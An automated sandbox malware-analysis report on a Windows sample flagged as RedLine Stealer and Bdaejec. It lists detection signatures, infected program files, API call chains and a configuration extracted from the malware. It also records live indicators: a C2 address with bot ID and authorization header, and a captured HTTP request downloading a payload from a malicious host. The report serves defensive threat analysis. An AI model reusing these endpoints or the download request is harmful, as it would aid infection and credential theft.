Windows Analysis Report
FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Overview

General Information

Sample name:	FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Analysis ID:	1482558
MD5:	c2bbbc6bb9408f1811a956ae26572f62
SHA1:	aba71a8c8738a382b3acc454a8ae70a794d760b7
SHA256:	9bc2f72646fcc040a0c11d469f353931f3d6eb606f8fa60bdcbd0fa091e59968
Tags:	exeRedLineStealer
Infos:

Detection

Bdaejec, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected Bdaejec

Yara detected RedLine Stealer

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net/	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarz	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.raru	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarA	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC:	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B

Found malware configuration

Source: 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: RedLine {"C2 url": "193.106.191.123:34450", "Bot Id": "50n", "Authorization Header": "d61a9ba1568b3b8e34c959aa0f254969"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Unpacked PE file: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack

Uses 32bit PE files

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.00000000006FE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb< source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32^ source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\yolarogi62\xemojecu_butupibojeyet\wefiwuroxiv\xuruka.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
Source:	Binary string: `C:\yolarogi62\xemojecu_butupibojeyet\wefiwuroxiv\xuruka.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source:	Binary string: System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004D38000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbW.: source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdbu source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Code function: 1_2_00F429E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_00F429E2

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Code function: 1_2_00F42B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00F42B8C

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 193.106.191.123:34450

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49704 -> 799

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 44.221.84.105:799
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 193.106.191.123:34450

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 44.221.84.105 44.221.84.105
Source: Joe Sandbox View	IP Address: 193.106.191.123 193.106.191.123

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: BOSPOR-ASRU BOSPOR-ASRU

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	TCP traffic detected without corresponding DNS query: 193.106.191.123
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Code function: 1_2_00F41099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

1_2_00F41099

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: IoUNtL.exe, 00000001.00000003.2016658609.0000000000840000.00000004.00001000.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2257080377.0000000000F43000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: IoUNtL.exe, 00000001.00000002.2256665001.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027571352.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027529653.00000000008EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/
Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2256774762.0000000000945000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027571352.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2257143065.000000000245A000.00000004.00000010.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027529653.00000000008EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2256774762.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarA
Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
Source: IoUNtL.exe, 00000001.00000002.2256665001.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027571352.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000003.2027529653.00000000008EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.raru
Source: IoUNtL.exe, 00000001.00000002.2257143065.000000000245A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarz
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1LR
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response(
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2LR
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response(
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3LR
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response(
Source: Amcache.hve.1.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2256774762.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com5
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Installs a raw input device (often for capturing keystrokes)

Source: SciTE.exe.1.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_290dccd1-9

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
